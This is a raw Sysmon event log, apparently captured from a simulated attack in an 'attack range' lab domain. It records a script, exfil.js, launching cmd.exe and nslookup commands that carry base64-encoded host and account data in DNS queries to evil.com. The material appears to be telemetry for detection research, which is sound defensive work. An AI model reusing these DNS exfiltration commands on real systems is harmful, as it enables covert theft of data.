14:16:24.358{2E1864BB-17A1-629A-783D-000000005F02}55522952C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-963F-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.361{2E1864BB-17B8-629A-963F-000000005F02}5484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsiw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.343{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgmrx.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.311{2E1864BB-17B8-629A-943F-000000005F02}17725620C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-953F-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.311{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-953F-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.311{2E1864BB-17B8-629A-933F-000000005F02}75607760C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-953F-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.316{2E1864BB-17B8-629A-953F-000000005F02}4848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-933F-000000005F02}7560C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgmrx.tmp 2>&1 10341000x8000000000000000198304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.296{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-943F-000000005F02}1772C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.296{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-943F-000000005F02}1772C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.292{2E1864BB-17B8-629A-943F-000000005F02}17725620C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-933F-000000005F02}7560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.258{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-943F-000000005F02}1772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.258{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-933F-000000005F02}7560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.243{2E1864BB-17A1-629A-783D-000000005F02}55525364C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-933F-000000005F02}7560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.258{2E1864BB-17B8-629A-933F-000000005F02}7560C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgmrx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.243{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcber.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.227{2E1864BB-17B8-629A-913F-000000005F02}58245624C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-923F-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.227{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.227{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.227{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.211{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-923F-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.211{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.211{2E1864BB-17B8-629A-903F-000000005F02}58961152C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-923F-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.226{2E1864BB-17B8-629A-923F-000000005F02}2328C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-903F-000000005F02}5896C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcber.tmp 2>&1 354300x8000000000000000198284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.816{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52512- 